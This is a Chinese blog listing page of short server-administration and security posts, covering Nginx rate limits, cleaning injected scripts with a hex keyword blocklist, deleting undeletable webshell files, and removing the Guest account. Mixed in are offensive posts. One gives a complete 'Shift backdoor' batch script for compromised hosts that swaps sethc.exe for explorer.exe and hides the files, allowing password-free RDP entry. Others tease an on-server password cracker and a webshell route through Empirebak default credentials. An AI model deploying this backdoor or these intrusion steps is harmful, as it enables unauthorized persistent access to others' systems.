无风的港湾

看了网上很多的Nginx介绍，就跟着弄，发现总是限制不了速度： 配置如下

http {
    limit_zone   one $binary_remote_addr 10m;

server{ …..

location /attachments/ {
            limit_conn   one 1;
            limit_rate 100k;
        }
}

}

在万般无奈下，找到这样句话“如果把limti_rate直接放在server{}中，而不是location中，确实能实现限速，但我只想限制附件下载的速度，请问大大该怎么搞？” (全文…)

标签Tags：服务器构建&安全

相关日志

• 无相关日志

最近我的网站经常把js脚本注入到数据，清除了又来。先后在网上找了很多的方法，还是没有用的，十分恼火。

首先先告诉大家一个批量清除代码的sql语句。

update 表名 set 字段=replace(字段,’script src=http://3b3.org/c.js>
1、分析那些无聊的人，或者有些病态的人究竟做了些什么 。

通过iis的日志或者microsoft urlscan 日志查看，在一些通过id查询数据库内容的时候后面被人加了一段很长的字符窜。

%%3B%%44%%65%%43%%4C%%61%%52%%45%%类似这样的字符窜，一定是其他的方式编码

首先我们先用工具分析下如此之长的字符窜究竟包含了些什么内容。

通过批量替换工具把%%全部替换成空，然后把得到的字符串通过其他的转码工具，转成字符窜。

;DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(0×45这里代码去掉了06F007200 aS NvArChAR(4000));ExEc(@S);–

就是一段与通过id查询数据库同时执行的sql，就给数据库某些表的字段加入了js病毒连接。

2、所以我们的原来的防sql注入的字符串就需要升级了。

如果过滤16进制

; 对应 3B

DeCLaRE 对应 4465434C615245

@ 对应 40

NvArCHaR 对应 4E76417243486152

set 对应 536554

CaSt 对应 43615374

as 对应 6153

exec 对应 45784563

- 对应 2D

把16进制的代码用|隔开放到injdata 里面

injdata = “3B|2D|’|;|and|exec|insert|select|delete%20from|update|count|”

然后自己测试下，程序是否拦击了这些16进制的代码，本人测试过是可以拦击的，如果不加入这些是不拦击的

照样可以注入到数据库。

标签Tags：ASP, js, sql, url, 人, 代码, 工具, 数据, 数据库, 方法, 服务器构建&安全, 程序, 类, 网站, 诫, 连接, 防注入

相关日志

• 基于JSON的高级AJAX开发技术 (0)
• 最令PHP初学者头痛的十四个问题 (0)
• 使用Ajax时的十个常犯的错误 (0)
• Rsync详解 (0)
• php的文档句法(heredoc)<<<和PHP字符串操作 (0)

一个用户的网站被挂马 很多以prn.开头的文件…这个文件其实是windows禁止建立的..但是可以在dos建立

所以在dos下用更改属性 结果不让改

然后想恢复权限 不让恢复 ，网站的跟目录被加了几个文件，怎么删也删不掉，

prn.gupiao.asp

prn.liuhe.asp

com1.shouji.asp

或是COM2，COM8等文件主，  

第一步：打开工具>文件夹选项>查看>有一项为”隐藏受保护的操作系统文件(推荐)”,去掉其前边的钩,选中”显示所有文件和文件夹”

第二步：建立一个del.bat的文件 把以下代码黏贴进去…

DEL /F /A /Q \\?\%1

RD /S /Q \\?\%1
然后要删那个文件就把那个文件拖进去即可….

但是又遇到问题了…有一个顽固的…PRN.asp;.jpg 拖进去也删不掉….

不过没问题 这个也可以删…先把这个文件的文件夹里的其他的文件备份…

然后把文件夹拖过去…^_^ 删了吧…

然后把备份的文件 拷回去 ok了

标签Tags：ASP, 代码, 属性, 工具, 操作系统, 服务器构建&安全, 系统, 网站, 隐藏

相关日志

• Rsync详解 (0)
• mysql优化及全文搜索 (0)
• ASP防注入新方式，希望对大家是有用的 (0)
• 游戏数值公式的表象与本质 (0)
• 深入探讨PHP中的内存管理问题 (0)

防止网卡被意外禁用，这个对大家可能没有多大的用途，但如果你有服务器托管在外面，那可就有用了，如果你那天不小心点到了“禁用”，呵呵，那后果我就不用说了吧，你的服务器马上就跟你说拜拜了，而且必须进入机房去重新启用网卡才可以（我就碰到了这样的倒霉事啊）。

闲话不多说，下面说重点：

实现的方法，用组策略来实现。

　　步骤：

　　1、运行——》gpedit.msc

　　2、导航至：用户配置——》管理模板——》网络——》网络连接

　　3.1、找到“禁止启用/禁用 LAN 连接的组件”，设置为“已启用”

　　3.2、找到“启用/禁用 LAN 连接的能力”，设置为“已禁用”

　　3.3、找到“为管理员启用 Windows 2000 网络连接设置”，设置为“已启用”

　　4、运行——》gpupdate /force

　　你现在检查一下本地连接的属性，“禁用”按钮已经变成灰色的不可用状态，这下你再也不用担心意外点中，让你的服务器跟你说拜拜了。

标签Tags：属性, 方法, 服务器构建&安全, 模板, 策略, 组件, 连接

相关日志

• Rsync详解 (0)
• Ajax的工作原理 (0)
• 角色动作控制接口的设计 (0)
• 游戏数值公式的表象与本质 (0)
• 服务器消息的广播 (0)

开始——运行regedt  启动注册表编辑器
找到HKEY_LOCAL_MACHINE窗口，选中SAM\SAM，然后点菜单中的权限设置，这时候我们可看到Administrators组只具有特殊权限，而SYSTEM账号却拥有全部控制权限，想一想这是为什么呢？其实很容易理解，SYSTEM账号是系统启动时候需要的账号，很多系统内核程序和服务程序大都是以该账号的权限运行的，若权限太低的话，恐怕我们的系统就运行不了！现在我们需要做的是更改Administrators权限（一定要在高级选项中记住该权限内容以备后用）为全部控制，这样我们就可以访问SAM下的信息了。
再次运行regedit：
此时HKEY_LOCAL_MACHINE\SAM\SAM下就有东西了，步步深入一直找到：
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5 和 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest
删除000001F5和Guest，然后退出regedit，再次运行regedt32，恢复Administrators对sam的权限（还记得Administrators的特殊权限吗？一定要记得啊，实在没有记住的话找其它同系统的机器看看也行，是一样的），这样是为了安全考虑，防止用户不小心删除系统账号。
进入dos窗口：
>net user
看看，会看大guest不见了，同样使用系统管理器的用户和组查看也是没有的了。这样就大功搞成了！
========
需要提醒的是：
1、不熟悉注册表编辑的一定不要乱来，否则可能导致系统崩溃。
2、删除前可考虑通过注册表的导出功能对删除的部分进行备份，以便恢复。 深入去玩的方法是：
可通过编辑注册表的SAM信息可轻松删除或改动其它账
2、可编写程序以SYSTEM权限运行来访问注册表中的SAM信息实现删除guest。

标签Tags：domain, 方法, 服务器构建&安全, 程序, 系统, 诫

相关日志

• 深入探讨PHP中的内存管理问题 (0)
• Webshell下破解计算机管理员密码 (0)
• PHP对文本数据库的基本操作方法 (0)
• ajax的缺点 (0)
• Ajax的工作原理 (0)

来源：脚本安全小组

在肉鸡上执行命令

copy c:\windows\explorer.exe c:\windows\system32\sethc.exe

copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe

以后再连接肉鸡3389，敲5下shift键就可以直接进入了，无需输入密码，只是登陆上去没有任务栏，一直会有密码登陆框，不过够我们做很多事情了,目前win2003测试通过。

似乎2000也可以，XP不行。这两个系统没测试。

不知道有牛人知道是什么道理不.

小道消息：连敲5次shift就自动激活连滞键设置~~也就是自动执行sethc.exe ，你把explorer.exe换成sethc.exe 就是自动执行explorer.exe

Shift后门TT整理版
来源：TT’s Blog

将下面的代码保存为tt.bat 然后到主机上运行~后门的启动了~

然后连接对方3389然后连续按5次Shift就能进入盘里了 然后进入c:\windows\system32\cmd.exe

或者建个bat内容为 call cmd.xe 就是系统权限了~管理员把你先的用户删了也不怕~

哇哈哈哈哈~~~
TITLE Shift后门
@echo off
cls
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo.
echo 使用方法:本文件执行完毕后,
echo 在终端界面按Shift 5次即可登陆系统!
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
echo 完成百分之 50
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
echo 完成百分之 80
attrib c:\windows\system32\sethc.exe +h
echo 完成百分之 90
attrib c:\windows\system32\dllcache\sethc.exe +h
echo 完成百分之 100
cls
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo 后门安装完毕！
echo.
echo 感谢您使用Shift后门
echo.
echo.
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo. & pause
exit

标签Tags：cache, title, 人, 代码, 密码, 感谢, 方法, 服务器构建&安全, 系统, 连接

相关日志

• mysql优化及全文搜索 (0)
• Rsync详解 (0)
• 数据服务器的设计 (0)
• 思维的惯性 (0)
• 多进程的游戏服务器设计 (0)

软件作者：taiwansee
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

这个idea源自以前学runas命令时候的启发。

使用方法：
    1、把你的密码字典改名成psw.txt后，上传到目标服务器的一个可执行、可写的目录中。这里假设这个目录是：c:\windows\temp\
    2、把程序上传到c:\windows\temp\中，然后运行它。
    3、然后就是等待，过几分钟（具体时间看你的字典大小了）查阅c:\windows\temp\下的result_.txt中的结果，
       如果为空就说明还没破解完，另选时间再回来看。

特点：
    不需要抓hash，不需要管理员权限，ISUR_*用户就能用，速度慢（这个也是特点哦）在测试机中的表现是每秒尝试1800个密码左右。
    默认破解administrator用户的密码。要破其它，请自行修改代码。
(全文…)

标签Tags：2008, code, div, domain, ie, include, mod, path, web, webs, 上传, 代码, 密码, 数据, 方法, 服务器构建&安全, 源代码, 程序, 诫, 说明, 软件, 链接

相关日志

• Rsync详解 (0)
• 最令PHP初学者头痛的十四个问题 (0)
• 帝国备份王(Empirebak)拿webshell (0)
• 基于JSON的高级AJAX开发技术 (0)
• PHP安全之数据过滤 (0)

由于windows2003默认仅支持2个终端用户的登陆。当“终端连接超出了最大连接”的情况出现导致不能登录时，可以：

1、在另外一台Windows2003的机器上运行“tsmmc.msc”，打开远程桌面连接，添加一个新的连接，输入远程服务器的IP地址、远程登录帐号和密码，登录到远程服务器桌面。这个方式可以随时登录到远程桌面。

2、在登录出问题的服务器上， 单击“开始”，指向“管理工具”，然后单击“终端服务配置”。

3、 单击“服务器设置”，然后双击“授权模式”。

4、将“授权模式”更改为“每用户”，然后单击“确定”。 以后就不会出现此类问题了。

原因：Window Server 2003 不管理“用户 CAL”。这就是说，即使许可证服务器数据库中有一个“用户 CAL”，它在被使用时也不会减少。这样就不会为了让每个用户都有一个有效的终端服务器 (TS) CAL 而根据“最终用户许可协议”(EULA) 的要求删除管理员。在没有使用“设备 CAL”的情况下，如果不是每个用户都有一个“用户 CAL”，就会违反 EULA。

标签Tags：server, 密码, 工具, 数据, 数据库, 服务器构建&安全, 类, 解决, 连接

相关日志

• mysql优化及全文搜索 (0)
• Rsync详解 (0)
• 最令PHP初学者头痛的十四个问题 (0)
• 多服务器的用户身份认证方案 (0)
• PHP封装常用Javascript为JS类以便快速调用 (2)

fhod 邪恶八进制
帝国备份王(Empirebak)简介
EmpireBak是一款完全免费、专门为Mysql大数据的备份与导入而设计的软件,系统采用分卷备份与导入,理论上可备份任何大小的数据库.
可在 http://www.phome.net/ebak2008os/ 下载到
默认账号密码为
admin  123456
登陆后先备份一次数据
备份时可选择备份到的目录。。默认有个safemod
当然也可以是别的..这里以safemod来说了
备份完毕后来到
管理备份目录
打包并下载
把开始备份到的数据可以先下回分析..当然数据库比较大的话可以省略这一步..因为我之前下载已经分析完毕了
(全文…)

标签Tags：2008, html, ie, mod, mysql, PHP, sql, web, webs, 密码, 成功, 数据, 数据库, 服务器构建&安全, 系统, 设计, 诫, 软件

相关日志

• mysql优化及全文搜索 (0)
• 最令PHP初学者头痛的十四个问题 (0)
• Webshell下破解计算机管理员密码 (0)
• PHP安全之数据过滤 (0)
• php的文档句法(heredoc)<<<和PHP字符串操作 (0)

放入Windows Server 2003安装光盘，在目录\Support\Tools\下面找到Support.msi文件，安装他。
　　安装文件也可以在http://www.cdnunion.net/soft/support.rar下载。
b.用cmd进入C:\Program Files\Support Tools目录。
c.删除0.0.0.0
　httpcfg delete iplisten -i 0.0.0.0
d.设定HTTP.sys（iis）只是侦听192.168.0.2这个IP地址，运行如下命令：
httpcfg set iplisten -i 192.168.0.2
返回的错误代码0代表成功完成
e.重起http.sys，依次在dos模式执行如下命令。
net stop http /y
net start w3svc

f.查询现在http.sys侦听Web服务的端口。
在dos模式用如下命令：
netstat -an
看看 tcp 0.0.0.0:80 0.0.0.0 listening 是否存在，如果不存在，先恭喜一下。
看看 tcp 192.168.0.2:80 …………… 是否存在，如果是，那就真正恭喜你了。
##########################################################

httpcfg query iplisten 查询

标签Tags：PHP, server, url, web, 代码, 成功, 服务器构建&安全, 诫, 错误

相关日志

• PHP和Socket简介 (0)
• 最令PHP初学者头痛的十四个问题 (0)
• PHP安全之数据过滤 (0)
• 深入探讨PHP中的内存管理问题 (0)
• mysql优化及全文搜索 (0)